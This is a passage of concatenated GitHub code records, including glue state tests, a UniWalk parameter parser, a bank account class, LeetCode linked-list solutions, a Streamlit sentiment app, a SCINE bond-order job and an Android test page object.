z=[1.1, 2.3, 1.2],\n label='test_data')\n\n class SimpleState(State):\n\n layer = CallbackProperty()\n comp = CallbackProperty()\n x_min = CallbackProperty()\n x_max = CallbackProperty()\n n_bin = CallbackProperty()\n common = CallbackProperty()\n\n state 
= SimpleState()\n\n helper = StateAttributeHistogramHelper(state, attribute='comp',\n lower='x_min', upper='x_max', n_bin='n_bin',\n common_n_bin='common')\n\n state.data = data\n\n state.comp = data.id['x']\n state.n_bin = 9\n state.comp = data.id['y']\n assert state.n_bin == 3\n state.comp = data.id['z']\n assert state.n_bin == 15\n\n state.n_bin = 12\n\n state.common = True\n\n state.comp = data.id['x']\n assert state.n_bin == 12\n\n state.n_bin = 11\n\n state.comp = data.id['y']\n assert state.n_bin == 3\n state.comp = data.id['z']\n assert state.n_bin == 11\n\n state.common = False\n state.n_bin = 13\n\n state.comp = data.id['x']\n assert state.n_bin == 11\n\n\ndef test_histogram_helper_common_n_bin_active():\n\n # Make sure that common_n_bin works as expected if True from start\n\n data = Data(x=[-3.2, 4.3, 2.2],\n y=['a', 'f', 'd'],\n z=[1.1, 2.3, 1.2],\n label='test_data')\n\n class SimpleState(State):\n\n layer = CallbackProperty()\n comp = CallbackProperty()\n x_min = CallbackProperty()\n x_max = CallbackProperty()\n n_bin = CallbackProperty()\n common = CallbackProperty(True)\n\n state = SimpleState()\n\n helper = StateAttributeHistogramHelper(state, attribute='comp',\n lower='x_min', upper='x_max', n_bin='n_bin',\n common_n_bin='common')\n\n state.data = data\n\n state.comp = data.id['x']\n state.n_bin = 9\n state.comp = data.id['z']\n assert state.n_bin == 9\n\n state.n_bin = 12\n\n state.common = True\n\n state.comp = data.id['x']\n assert state.n_bin == 12\n\n state.n_bin = 11\n\n state.comp = data.id['y']\n assert state.n_bin == 3\n state.comp = data.id['z']\n assert state.n_bin == 11\n\n state.common = False\n state.n_bin = 13\n\n state.comp = data.id['x']\n assert state.n_bin == 11\n\n\ndef test_limits_helper_initial_values():\n\n # Regression test for a bug that occurred if the limits cache was empty\n # but some attributes were set to values - in this case we don't want to\n # override the existing values.\n\n data = Data(x=np.linspace(-100, 100, 10000),\n y=np.linspace(2, 3, 10000), label='test_data')\n\n class SimpleState(State):\n\n layer = CallbackProperty()\n comp = CallbackProperty()\n lower = CallbackProperty()\n upper = CallbackProperty()\n\n state = SimpleState()\n state.lower = 1\n state.upper = 2\n state.comp = data.id['x']\n\n helper = StateAttributeLimitsHelper(state, attribute='comp',\n lower='lower', upper='upper')\n\n assert helper.lower == 1\n assert helper.upper == 2\n\n\nclass DatetimeState(State):\n a = CallbackProperty()\n\n\ndef test_state_serialization_datetime64():\n\n state1 = DatetimeState()\n state1.a = np.datetime64(100, 'D')\n\n state2 = clone(state1)\n\n assert state2.a == np.datetime64(100, 'D')\n\n\ndef test_nan_inf_minmax():\n\n data = Data(x=[3, 1, -2, np.inf, np.nan], label='test_data')\n\n class SimpleState(State):\n\n layer = CallbackProperty()\n comp = CallbackProperty()\n lower = CallbackProperty()\n upper = CallbackProperty()\n percentile = CallbackProperty()\n log = CallbackProperty()\n\n state = SimpleState()\n\n helper = StateAttributeLimitsHelper(state, attribute='comp', # noqa\n lower='lower', upper='upper',\n percentile='percentile', log='log')\n\n state.data = data\n state.comp = data.id['x']\n\n assert state.lower == -2\n assert state.upper == +3\n\n state.log = True\n\n assert state.lower == +1\n assert state.upper == +3\n\n state.log = False\n state.percentile = 99\n\n assert_allclose(state.lower, -1.97)\n assert_allclose(state.upper, +2.98)\n\n\ndef test_percentile_no_log():\n\n # Regression test for a bug that caused a 
crash if the state class had a\n # percentile attribute but no log.\n\n data = Data(x=np.linspace(-100, 100, 10000),\n y=np.linspace(2, 3, 10000), label='test_data')\n\n class SimpleState(State):\n\n layer = CallbackProperty()\n comp = CallbackProperty()\n lower = CallbackProperty()\n upper = CallbackProperty()\n scale = CallbackProperty()\n\n state = SimpleState()\n\n state.comp = data.id['x']\n state.lower = 2\n state.upper = 4\n\n helper = StateAttributeLimitsHelper(state, attribute='comp',\n lower='lower', upper='upper',\n percentile='scale')\n\n state.scale = 90\n","repo_name":"glue-viz/glue","sub_path":"glue/core/tests/test_state_objects.py","file_name":"test_state_objects.py","file_ext":"py","file_size_in_byte":14278,"program_lang":"python","lang":"en","doc_type":"code","stars":699,"dataset":"github-code","pt":"54"} +{"seq_id":"21028678337","text":"import random\nx = ['Dan', 'Lukasz', 'Konrad', 'Madi', 'Ewelina B.', 'Ewelina', 'Gosia', 'Zosia', 'Ula', 'Tomek',] # people list\ny = [] # machine list\nwhile True:\n p = input('how many people at overtimes?')\n if p.isdecimal():\n pp= int(p)\n break\n \n\n\n\ni = 0\n\nwhile i < pp:\n while True:\n c = input('name: ')\n if c.isdecimal():\n cc=str(c)\n x.append(c)\n break\n i+=1\n \n\ni = 0\nl = len(x) \n\nwhile i < l :\n while True:\n d = input('machine nr:')\n if d.isdecimal():\n dd=int(d)\n y.append(d)\n break\n i+=1\nprint('---------------------------------------')\ni = 0\nrandom.shuffle(y)\nrandom.shuffle(x)\ni = 0\nwhile i < l:\n print(x[i], y[i], sep=' - ')\n i+=1\n\n","repo_name":"pydanielthon/mps-programy","sub_path":"losowanie maszyn i ludzi.py","file_name":"losowanie maszyn i ludzi.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"11816229955","text":"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nUniwalk\n- An explainable and accurate recommender system\n for rating and network data\n\nAuthors\n- Haekyu Park (hkpark627@snu.ac.kr)\n- Hyunsik Jeon (jeon185@gmail.com)\n- Junghwan Kim (kjh900809@snu.ac.kr)\n- Beunguk Ahn (elaborate@snu.ac.kr)\n- U Kang (ukang@snu.ac.kr)\n\nFile\n- parser.py\n : controls hyperparameters\n\nThis software is free of charge under research purposes.\nFor commercial purposes, please contact the authors.\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nImport Package\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nimport argparse\nimport numpy as np\nimport pandas as pd\n\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\nParse arguments\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# Define hyperparameters\ndef parse_args():\n\t# Create an argument parser\n\tparser = argparse.ArgumentParser('UniWalk')\n\n\t# Arguments related to input\n\tparser.add_argument('--dataset', default='filmtrust', help='Dataset 
name')\n\tparser.add_argument('--min_u_id', default=0, help='Min id of users')\n\tparser.add_argument('--max_u_id', default=1641, help='Max id of users')\n\tparser.add_argument('--min_i_id', default=1642, help='Min id of items')\n\tparser.add_argument('--max_i_id', default=3712, help='Max id of items')\n\tparser.add_argument('--max_r', default=0.5, help='Max of observed rating')\n\tparser.add_argument('--min_r', default=4.0, help='Min of observed rating')\n\tparser.add_argument('--mu', default=3, help='Average observed rating')\n\tparser.add_argument('--num_entities', default=0, help='Number of entities')\n\n\t# Arguments related to file paths\n\tparser.add_argument('--inputpath', default='', help='Path of data files')\n\tparser.add_argument('--graphpath', default='', help='Path of unified graph')\n\tparser.add_argument('--learningpath', default='', help='Path of result files')\n\t\n\t# Arguments related to building graph\n\tparser.add_argument('--c', default=5, help='Weight of user-user edges')\n\n\t# Arguments related to the sampling phase\n\tparser.add_argument('--wl', default=50, help='Walk length')\n\n\t# Arguments related to the optimization phase\n\tparser.add_argument('--ws', default=7, help='Window size')\n\tparser.add_argument('--alpha', default=0.01, help='Weight of positive term')\n\tparser.add_argument('--beta', default=0.005, help='Weight of negative term')\n\tparser.add_argument('--gamma', default=0.2, help='Momentum parameter')\n\tparser.add_argument('--dim', default=25, help='Dimension of embedded vectors')\n\tparser.add_argument('--lz', default=0.1, help='Regularization parameter for vector')\n\tparser.add_argument('--lb', default=0.1, help='Regularization parameter for bias')\n\tparser.add_argument('--lr', default=0.01, help='Learning rate')\n\tparser.add_argument('--max_circuits', default=7, help='Maximal number of circuits to learn')\n\tparser.add_argument('--max_sets', default=4, help='Maximal number of sets to learn')\n\tparser.add_argument('--conv', default=0.0001, help='Convergence threshold')\n\n\t# Arguments related to file names to be saved\n\tparser.add_argument('--graphparas', default='', help='Parameters for building graph')\n\tparser.add_argument('--learningparas', default='', help='Parameters for learning')\n\n\treturn parser.parse_args()\n\n\n# Set parameters of string to numbers\ndef set_paras(args):\n\targs.min_u_id = int(args.min_u_id)\n\targs.max_u_id = int(args.max_u_id)\n\targs.min_i_id = int(args.min_i_id)\n\targs.max_i_id = int(args.max_i_id)\n\targs.mu = float(args.mu)\n\targs.max_r = float(args.max_r)\n\targs.min_r = float(args.min_r)\n\targs.c = float(args.c)\n\targs.ws = int(args.ws)\n\targs.wl = int(args.wl)\n\targs.alpha = float(args.alpha)\n\targs.beta = float(args.beta)\n\targs.dim = int(args.dim)\n\targs.lb = float(args.lb)\n\targs.lz = float(args.lz)\n\targs.gamma = float(args.gamma)\n\targs.max_sets = int(args.max_sets)\n\targs.max_circuits = int(args.max_circuits)\n\n\n# Define file paths and names\ndef set_files(args):\n\tdataset = args.dataset\n\targs.inputpath = '../data/%s/input/' % dataset\n\targs.graphpath = '../data/%s/graph/' % dataset\n\targs.learningpath = '../data/%s/learning/' % dataset\n\targs.graphparas = '%s' % args.c\n\targs.learningparas = '%s_%s_%s_%s_%s_%s_%s_%s_%s' % \\\n\t\t(args.alpha, args.beta, args.gamma, args.dim, args.lb, args.lz, args.lr, args.ws, args.wl)\n\n\n# Set basic info of ratings\ndef set_basic_info(args):\n\t# Read rating\n\trui = pd.read_csv(args.inputpath + 'rating.tsv', sep='\\t', names=['u', 
'i', 'r'])\n\n\t# Set min and max of ids\n\targs.min_u_id = min(rui.u)\n\targs.max_u_id = max(rui.u)\n\targs.min_i_id = min(rui.i)\n\targs.max_i_id = max(rui.i)\n\n\t# Set max and min of rating\n\targs.max_r = max(rui.r)\n\targs.min_r = min(rui.r)\n\n\t# Set mu\n\targs.mu = np.average(rui.r)\n\n\n# Print the setted arguments\ndef args_to_string(args):\n\ts = \"-------------------- Arguments ---------------------\\n\"\n\ts += \"dataset = %s\\n\" % args.dataset\n\ts += \"c = %s\\n\" % args.c\n\ts += \"wl = %s\\n\" % args.wl\n\ts += \"ws = %s\\n\" % args.ws\n\ts += \"lr = %s\\n\" % args.lr\n\ts += \"dim = %s\\n\" % args.dim\n\ts += \"alpha = %s\\n\" % args.alpha\n\ts += \"beta = %s\\n\" % args.beta\n\ts += \"gamma = %s\\n\" % args.gamma\n\ts += \"lambda_z = %s\\n\" % args.lz\n\ts += \"lambda_b = %s\\n\" % args.lb\n\ts += \"-------------------- Arguments ---------------------\\n\"\n\treturn s\n\n\n# Print the arguments\ndef print_args(args):\n\tprint(args_to_string(args))\n\n\n","repo_name":"mikele700/ExplainableRecommendation","sub_path":"UniWalk-1.0/src/par.py","file_name":"par.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6203418462","text":"from argparse import ArgumentError\nfrom account import Account\n\nclass MoneyMarketAccount(Account):\n\n def __init__(self, balance):\n parent_instance = super()\n parent_instance.__init__(balance)\n if self.balance < 10000:\n raise ValueError(\"Sorry, account balance can't be less than $10000\")\n self.transactions = 0\n self.low_balance = False\n \n def withdraw(self, debit):\n if self.transactions < 6:\n if not(self.low_balance):\n if (self.balance - debit ) < 10000:\n print('Balance less than $10000; $100 fee and no more transactions')\n self.low_balance = True\n self.balance -= debit + 100\n self.transactions += 1\n else:\n self.balance -= debit\n self.transactions += 1\n else:\n print('Account below minimum; no transactions until above $10000')\n else:\n print('Maximum number of transactions (6) reached')\n\n def deposit(self, amount):\n if self.transactions < 6:\n if self.low_balance:\n self.balance += amount\n self.low_balance = False\n else:\n self.balance += amount\n self.transactions += 1\n else:\n print('Maximum number of transactions (6) reached')\n \n def add_interest(self, rate):\n interest = (self.balance * rate) / 100\n self.balance += interest\n\n def reset_transactions(self):\n self.transactions = 0 ##### Call with instance.reset_transactions()\n\n# money = MoneyMarketAccount(20000)\n# print(money.balance)\n# money.add_interest(0.25)\n# print(money.balance)\n# money.withdraw(1000)\n# print(money.transactions)\n# money.withdraw(1000)\n# print(money.transactions)\n# money.withdraw(1000)\n# print(money.transactions)\n# money.withdraw(1000)\n# print(money.transactions)\n# money.withdraw(1000)\n# print(money.transactions)\n# money.withdraw(1000)\n# print(money.transactions)\n# print(money.balance)\n# money.withdraw(1000)\n# print(money.transactions)\n# print(money.balance)\n# money.reset_transactions()\n# print(money.transactions)","repo_name":"craigbucher/oop-bank-accounts","sub_path":"money_market.py","file_name":"money_market.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5528379044","text":"\nfrom django.urls import path\n\nfrom . 
import views\n\nurlpatterns = [\n\n path('', views.all_products, name='products'),\n\n path('/', views.product_detail, name='product_detail'),\n\n path('category//', views.search_category, name='search_category'),\n\n]\n","repo_name":"Code-Institute-Submissions/Portfolio-Project-5-E-commerce-Store","sub_path":"products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15611860241","text":"##########################################\n# LeetCode – Plus One Linked List (Java)\n##########################################\n\n# Given a non-negative number represented as a singly linked list of digits, plus one to the number.\n\n# The digits are stored such that the most significant digit is at the head of the list.\n# Example:\n\n# Input:\n# 1->2->3\n\n# Output:\n# 1->2->4\n\n\n# V0\n\n# V1 \n# https://www.jiuzhang.com/solution/plus-one-linked-list/#tag-highlight-lang-python\n\n\"\"\"\nDefinition of ListNode\nclass ListNode(object):\n def __init__(self, val, next=None):\n self.val = val\n self.next = next\n\"\"\"\n\nclass Solution:\n \"\"\"\n @param head: the first Node\n @return: the answer after plus one\n \"\"\"\n def plusOne(self, head):\n # Write your code here\n dummy = ListNode(0)\n dummy.next = head\n l = dummy\n r = dummy\n while r.next != None:\n r = r.next\n if r.val != 9:\n l = r\n \n if r.val != 9:\n r.val += 1;\n else:\n l.val += 1\n l = l.next\n while l != None:\n l.val = 0\n l = l.next\n \n if dummy.val == 0:\n return dummy.next\n \n return dummy;\n\n# V1'\nclass Solution(object):\n def plusOne(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n my_list = []\n while head:\n my_list.append(head.val)\n head = head.__next__ \n extra = 0 \n count = 0 \n output = []\n for i in my_list[::-1]:\n if count==0:\n i = i + 1 + extra \n i = i + extra\n if i >= 10:\n i = i%10 \n extra = 1 \n else:\n extra = 0 \n output.append(i)\n count = count + 1\n if extra==1:\n output.append(1)\n return output[::-1]\n\n# V2 \n# https://github.com/apachecn/awesome-algorithm/blob/master/docs/Leetcode_Solutions/Python/369.Plus%20One%20Linked%20List.md\nclass Solution(object):\n def plusOne(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n lst = []\n cur = head \n\n while cur:\n lst.append(cur)\n cur = cur.__next__\n\n carry = 1\n for i in range(len(lst)-1,-1,-1):\n lst[i].val += carry\n if lst[i].val < 10:\n carry = 0\n break\n else:\n lst[i].val -= 10\n\n if carry == 1:\n node = ListNode(1)\n node.next = head\n return node\n else:\n return head \n\n# V3 \n# Time: O(n)\n# Space: O(1)\nclass ListNode(object):\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\n# Two pointers solution.\nclass Solution(object):\n def plusOne(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n if not head:\n return None\n\n dummy = ListNode(0)\n dummy.next = head\n\n left, right = dummy, head\n while right.__next__:\n if right.val != 9:\n left = right\n right = right.__next__\n\n if right.val != 9:\n right.val += 1\n else:\n left.val += 1\n right = left.__next__\n while right:\n right.val = 0\n right = right.__next__\n\n return dummy if dummy.val else dummy.__next__\n\n\n# V4 \n# Time: O(n)\n# Space: O(1)\nclass Solution2(object):\n def plusOne(self, head):\n \"\"\"\n :type head: ListNode\n :rtype: ListNode\n \"\"\"\n def reverseList(head):\n dummy = ListNode(0)\n curr = head\n while curr:\n dummy.next, curr.next, curr = 
curr, dummy.next, curr.next\n return dummy.__next__\n\n rev_head = reverseList(head)\n curr, carry = rev_head, 1\n while curr and carry:\n curr.val += carry\n carry = curr.val / 10\n curr.val %= 10\n if carry and curr.__next__ is None:\n curr.next = ListNode(0)\n curr = curr.__next__\n\n return reverseList(rev_head)\n","repo_name":"yennanliu/CS_basics","sub_path":"leetcode_python/Linked_list/plus-one-linked-list.py","file_name":"plus-one-linked-list.py","file_ext":"py","file_size_in_byte":4279,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"54"} +{"seq_id":"13506894956","text":"import streamlit as st\nimport pandas as pd\nfrom transformers import AutoTokenizer, AutoModelForSequenceClassification\nfrom transformers import Trainer\nimport numpy as np\n\nif selection == 'Sentiment':\n st.title(\"Sentiment Analysis\")\n\n uploaded_file = st.file_uploader(\"Choose an Excel file\", type=['xlsx'])\n\n if uploaded_file is not None:\n df = pd.read_excel(uploaded_file)\n \n local_csv_dataset = df[['text']]\n pred_texts = local_csv_dataset.dropna().astype('str')\n pred_texts = pred_texts['text'].tolist()\n \n model_name = \"siebert/sentiment-roberta-large-english\"\n tokenizer = AutoTokenizer.from_pretrained(model_name)\n model = AutoModelForSequenceClassification.from_pretrained(model_name)\n trainer = Trainer(model=model)\n \n tokenized_texts = tokenizer(pred_texts, truncation=True, padding=True)\n \n class SimpleDataset:\n def __init__(self, tokenized_texts):\n self.tokenized_texts = tokenized_texts\n \n def __len__(self):\n return len(self.tokenized_texts[\"input_ids\"])\n \n def __getitem__(self, idx):\n return {k: v[idx] for k, v in self.tokenized_texts.items()}\n \n pred_dataset = SimpleDataset(tokenized_texts)\n predictions = trainer.predict(pred_dataset)\n preds = predictions.predictions.argmax(-1)\n labels = pd.Series(preds).map(model.config.id2label)\n scores = (np.exp(predictions[0]) / np.exp(predictions[0]).sum(-1, keepdims=True)).max(1)\n sentiment = pd.DataFrame(list(zip(pred_texts, preds, labels, scores)), columns=['text', 'Prediction', 'Label', 'Score'])\n \n # Display the sentiment analysis results\n st.write(sentiment)\n","repo_name":"Majozi/nlp_project","sub_path":"sentiment.py","file_name":"sentiment.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"31664741901","text":"\"\"\"\r\nFunções (def) em python - *args **kwargs\r\nParte 3\r\n\"\"\"\r\n\r\n# Args: Serve quando não sabemos quantos argumentos colocar na função. 
Serve parar empacotamente e desempacotamento.\r\n\r\n\r\n# def func(*args):\r\n# print(args)\r\n#\r\n#\r\n# lista = [1, 2, 3, 4, 5]\r\n# n1, n2, *n = lista\r\n# print(n1, n2, n)\r\n\r\n# Neste caso estou desempacotando os valores da lista sendo n1 = 1, n2 = 2, e n = [3, 4, 5] (restante da lista)\r\n\r\n# Agora vou copiar o exemplo do professor explicando que *args é uma tupla empacotada.\r\n\r\n# def func (*args): # Se tornam uma tupla\r\n# print(args) # Tupla impressa empacotada\r\n# print(args[0]) # Acessando o primeiro valor da tupla\r\n# print(args[-1]) # Acessando o ultimo valor da tupla\r\n# print(len(args)) # Imprimindo o comprimento da tupla\r\n#\r\n#\r\n# func(1, 2, 3, 4, 5) # Valores para a função\r\n\r\n# É possivel fazer cast de uma tupla para lista com sintaxe args = list(args).\r\n\r\n# Exemplo de iteração dentro da função\r\n\r\n\r\n# def func(*args):\r\n# for v in args:\r\n# print(v)\r\n#\r\n#\r\n# func(1, 2, 3, 4, 5)\r\n\r\n# kwargs são para argumentos nomeados e diiferentemente dos args, kwargs acompanham 2 \"*\"\r\n\r\n# def func(**kwargs):\r\n# print(kwargs['nome'], kwargs['sobrenome'])\r\n#\r\n#\r\n# func(nome='kilder', sobrenome='colvalan')\r\n\r\n# .get para verificar se argumento existe.\r\n\r\n\r\ndef func(**kwargs):\r\n\r\n nome = kwargs.get('nome')\r\n\r\n if nome is not None:\r\n print(nome)\r\n else:\r\n print('Nome inexistente')\r\n\r\n\r\nfunc(nome='Kilder')\r\n","repo_name":"Colvalan/Meu_Aprendizado","sub_path":"modulo_intermediario/aulas/aula3.py","file_name":"aula3.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71242595361","text":"# -*- coding: utf-8 -*-\n__copyright__ = \"\"\" This code is licensed under the 3-clause BSD license.\nCopyright ETH Zurich, Laboratory of Physical Chemistry, Reiher Group.\nSee LICENSE.txt for details.\n\"\"\"\n\nfrom scine_puffin.config import Configuration\nfrom .templates.job import calculation_context, job_configuration_wrapper\nfrom .templates.scine_connectivity_job import ConnectivityJob\n\n\nclass ScineBondOrders(ConnectivityJob):\n \"\"\"\n A job calculating bond orders.\n\n **Order Name**\n ``scine_bond_orders``\n\n **Optional Settings**\n Optional settings are read from the ``settings`` field, which is part of\n any ``Calculation`` stored in a SCINE Database.\n Possible settings for this job are:\n\n only_distance_connectivity :: bool\n Whether the bond orders shall be constructed via distance information only (True)\n or from an electronic structure calculation (False). (default: False)\n add_based_on_distance_connectivity :: bool\n If ``True``, the structure's connectivity is derived from interatomic\n distances via the utils.BondDetector: The bond orders used for\n interpretation are set to the maximum between those given by an electronic structure\n calculation and 1.0, whereever the utils.BondDetector\n detects a bond. (default: True)\n sub_based_on_distance_connectivity :: bool\n If ``True``, the structure's connectivity is derived from interatomic\n distances via the utils.BondDetector: The bond orders used given by an electronic structure\n calculation are removed, whereever the utils.BondDetector does not\n detect a bond. (default: True)\n add_graph :: bool\n Whether to add a molassembler graph and decision list to the structure\n based on the determined bond orders. 
(default: True)\n\n All settings that are recognized by the SCF program chosen.\n\n Common examples are:\n\n max_scf_iterations :: int\n The number of allowed SCF cycles until convergence.\n\n **Required Packages**\n - SCINE: Database (present by default)\n - SCINE: molassembler (present by default)\n - SCINE: Readuct (present by default)\n - SCINE: Utils (present by default)\n - A program implementing the SCINE Calculator interface, e.g. Sparrow\n\n **Generated Data**\n If successful the following data will be generated and added to the\n database:\n\n Properties\n The ``bond_orders`` (``SparseMatrixProperty``) are added.\n Optionally the ``electronic_energy`` associated with the structure if it\n is present in the results of provided by the calculator interface.\n Other\n If a graph is requested, graph representations of the structure will be\n added to the structures ``graphs`` field. The added representations are:\n A representation of the graph ``masm_cbor_graph``, and the decision\n representations of the existing stereopermutators using a nearest\n neighbour fit ``masm_decision_list``.\n Any previous graph representations of the structure will be overwritten.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.name = \"Scine Bond Order Job\"\n\n @job_configuration_wrapper\n def run(self, manager, calculation, config: Configuration) -> bool:\n\n import scine_database as db\n import scine_readuct as readuct\n\n # Get structure\n structure = db.Structure(calculation.get_structures()[0], self._structures)\n settings_manager, program_helper = self.create_helpers(structure)\n settings_manager.separate_settings(calculation.get_settings())\n\n # Get connectivity settings and remove them from settings passed to readuct\n self.extract_connectivity_settings_from_dict(settings_manager.task_settings)\n add_graph = settings_manager.task_settings.pop(\"add_graph\", True)\n\n # actual calculation\n success = False # success might not be set if something throws in context -> ensure it exists in scope\n with calculation_context(self):\n # Distance based bond orders\n if self.connectivity_settings[\"only_distance_connectivity\"]:\n bond_orders = self.distance_bond_orders(structure)\n # Bond order calculation with readuct\n else:\n systems, keys = settings_manager.prepare_readuct_task(\n structure,\n calculation,\n settings_manager.task_settings,\n config[\"resources\"],\n )\n if program_helper is not None:\n program_helper.calculation_preprocessing(\n systems[keys[0]], settings_manager.task_settings\n )\n systems, success = readuct.run_single_point_task(\n systems, keys, require_bond_orders=True, **settings_manager.task_settings\n )\n\n self.throw_if_not_successful(success, systems, keys)\n bond_orders = systems[keys[0]].get_results().bond_orders\n\n # Graph generation\n if add_graph:\n self.add_graph(structure, bond_orders)\n\n # There are no results if the bond orders are purely distance based\n if self.connectivity_settings[\"only_distance_connectivity\"]:\n self.verify_connection()\n self.capture_raw_output()\n else:\n self.sp_postprocessing(\n success, systems, keys, structure, program_helper\n )\n\n # Store bond orders\n self.store_property(\n self._properties,\n \"bond_orders\",\n \"SparseMatrixProperty\",\n bond_orders.matrix,\n calculation.get_model(),\n calculation,\n structure,\n )\n\n return 
self.postprocess_calculation_context()\n","repo_name":"qcscine/puffin","sub_path":"scine_puffin/jobs/scine_bond_orders.py","file_name":"scine_bond_orders.py","file_ext":"py","file_size_in_byte":5955,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} +{"seq_id":"7035524167","text":"import argparse\nimport torch\nimport models\nimport datasets\n\n# Argument parsing\nparser = argparse.ArgumentParser(description=\"Sentiment analysis through Yelp reviews.\")\nparser.add_argument('--enable-cuda', action='store_true', help='Enable CUDA')\nparser.add_argument('--visualize', action='store_true', help='Enable visdom visualization')\nparser.add_argument('--load-path', action='store', help='Path to checkpoint file for evaluation.')\nparser.add_argument('--data-path', action='store', help='Path to dataset.')\nparser.add_argument('--text', action='store', help='Text for live evaluation.')\nparser.add_argument('--port', action='store', help='Port when using live evaluation server')\nparser.add_argument('--host', action='store', help='Host when using live evaluation server')\nargs = parser.parse_args()\n\nEPOCHS = 10\nLEARNING_RATE = 0.001\nBATCH_SIZE = 100\nGPU = torch.cuda.is_available()\n\nMODEL = {\n \"model\": models.PureGRU,\n \"embedding_dim\": 50,\n \"input_size\": 50,\n \"hidden_size\": 128,\n \"num_layers\": 1,\n \"kernel_size\": 5,\n \"intermediate_size\": 32,\n \"dropout\": 0.0,\n}\n\nDATASET = datasets.GlovePretrained50d\nDATA_KWARGS = {\n \"glove_path\": \"glove.6B.50d.txt\"\n}\n\nVISUALIZE = args.visualize\nCHECKPOINT_DIR = \"checkpoints\"\n\nGPU = torch.cuda.is_available() and args.enable_cuda\nHIST_OPTS = dict(numbins=20,\n xtickmin=0,\n xtickmax=6)\n","repo_name":"Demborg/LSTM_sentiment","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1389,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"29395336918","text":"# -*- coding: utf-8 -*-\nimport time\nimport datetime\nfrom api.api import API\nfrom utility.device_info_util import DeviceInfoUtil\nfrom pages.android.common.super_page import SuperPage\nfrom pages.android.shanghu.lefuzhangdan_page_configs import LeFuZhangDanPageConfigs as LFZDPC\nfrom pages.logger import logger\n\n\nclass LeFuZhangDanPage(SuperPage):\n '''\n 作者 乔佳溪\n 订单管理\n '''\n def __init__(self, testcase, driver, logger):\n super(LeFuZhangDanPage, self).__init__(testcase, driver, logger)\n\n def validSelf(self):\n '''\n usage: 验证乐付账单\n '''\n logger.info(\"Check 乐付账单 begin\")\n API().assertElementByText(self.testcase,\n self.driver,\n self.logger,\n LFZDPC.text_user_defined,\n LFZDPC.verify_timeout)\n logger.info(\"Check 乐付账单 end\")\n\n def clickOnUserDefined(self):\n '''\n usage: 点击自定义\n '''\n logger.info(\"Click 自定义 begin\")\n API().clickElementByText(self.testcase,\n self.driver,\n self.logger,\n LFZDPC.text_user_defined,\n LFZDPC.verify_timeout)\n logger.info(\"Click 自定义 end\")\n\n def validCalendar(self):\n '''\n usage: 验证日历\n '''\n logger.info(\"Check 日历 begin\")\n API().assertElementByText(self.testcase,\n self.driver,\n self.logger,\n LFZDPC.text_calendar_start,\n LFZDPC.verify_timeout)\n\n API().assertElementByText(self.testcase,\n self.driver,\n self.logger,\n LFZDPC.text_calendar_end,\n LFZDPC.verify_timeout)\n logger.info(\"Check 日历 end\")\n\n def clickOnStartDate(self):\n '''\n usage: 选择当前日期的前一天\n '''\n logger.info(\"Click 自定义 begin\")\n logger.info(\"Click 自定义查询时间 begin\")\n version = 
